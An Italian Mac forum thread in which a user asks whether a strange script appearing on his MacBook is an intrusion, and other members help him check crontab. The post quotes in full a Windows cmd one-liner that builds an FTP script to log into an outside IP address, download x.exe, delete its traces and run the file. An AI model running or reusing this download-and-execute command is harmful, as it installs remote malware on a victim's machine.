Intrusione ?

Non esistono domande banali o sciocche: chiedi qui… il forum serve proprio a questo!
Post Reply
User avatar
esteban14
Approdato su Mac Peer
Posts: 4
Joined: Thu May 20, 2010 8:06 pm
Intrusione ?

Post by esteban14 »

Ciao a tutti,
è il mio primo msg, quindi chiedo venia se sbaglio qualcosa.
Ho un Macbook Pro in cui gira Tiger, da qualche giorno, io lo vedo alla sera quando ci smanetto, ad un certo punto da solo parte questo script:

cmd /c echo open 65.113.3.92 21 >> ik &echo user st_joe bw >> ik &echo binary >> ik &echo get x.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &x.exe &exit
cmd /c close

Se sto cliccando su una cartella, mi rinomina la cartello con il testo dello script, se sono in rete e sto ad esempio chattando, mi scrive lo script nel campo del testo.

Secondo voi è un'intrusione?

Ciao e grazie
Esteban
User avatar
Peterpan
Quintessenza di Mac Peer
Posts: 9823
Joined: Sat Jan 06, 2007 7:53 am

Post by Peterpan »

Forse dovresti spiegare meglio. Effettivamente e' uno script che lancia un ftp e preleva un file eseguibile per windows.

Cosa fai quando parte ? Riesci a ricordare da quanto tempo fa questo e se puo' essere legato a qualche installazione o operazione particolare che hai fatto ?

Per verificare comunque perche' parte: apri il terminale e digita:

sudo crontab -l (inserisci la password)

e poi posta qui il risultato.
Chi non accetta critiche o discussioni e fa tutto per evitarle è un cialtrone, digli di smettere !!!
User avatar
esteban14
Approdato su Mac Peer
Posts: 4
Joined: Thu May 20, 2010 8:06 pm

Post by esteban14 »

Quando parte lo script mi parte la sudorazione :) , non faccio nulla, scrive il testo dove capita e si ferma.
Forse è iniziato dopo che ho aggiornato il programma per il TomTom.
Comunque seguo le tue indicazione e riporto il risultato.
Scusa la domanda da profano:
la password è quella utente? Nel caso io non abbia creato nessun utente lascio in bianco?

Grazie mille

Stefano
User avatar
Peterpan
Quintessenza di Mac Peer
Posts: 9823
Joined: Sat Jan 06, 2007 7:53 am

Post by Peterpan »

La password e' quella dell'utente con privilegi di amministratore.
Chi non accetta critiche o discussioni e fa tutto per evitarle è un cialtrone, digli di smettere !!!
User avatar
esteban14
Approdato su Mac Peer
Posts: 4
Joined: Thu May 20, 2010 8:06 pm

Post by esteban14 »

Peterpan wrote:La password e' quella dell'utente con privilegi di amministratore.
Io non ho mai impostato nessuna password, come devo fare per avere privilegi da amministratore?
Votantonio
Oracolo di Mac Peer
Posts: 4094
Joined: Tue May 13, 2008 3:30 am

Post by Votantonio »

Io credo che tu i privilegi di amministratore li abbia comunque se sei l'unico proprietario e amministratore del computer.
Una password di login comunque ci vuole, la puoi reimpostare da Preferenze di Sistema/Account/.
User avatar
esteban14
Approdato su Mac Peer
Posts: 4
Joined: Thu May 20, 2010 8:06 pm

Post by esteban14 »

Ecco il risultato, sempre che abbia fatto le cose a modo:

Last login: Mon May 24 08:50:42 on console
Welcome to Darwin!
computer-di-utente:~ utente$ sudo crontab -l
Password:
crontab: no crontab for root
computer-di-utente:~ utente$
Votantonio
Oracolo di Mac Peer
Posts: 4094
Joined: Tue May 13, 2008 3:30 am

Post by Votantonio »

Allora puoi stare tranquillo, non hai malware nel tuo Mac.
Resta da capire che diavolo sia quello script e perchè si comporta così.

Post Reply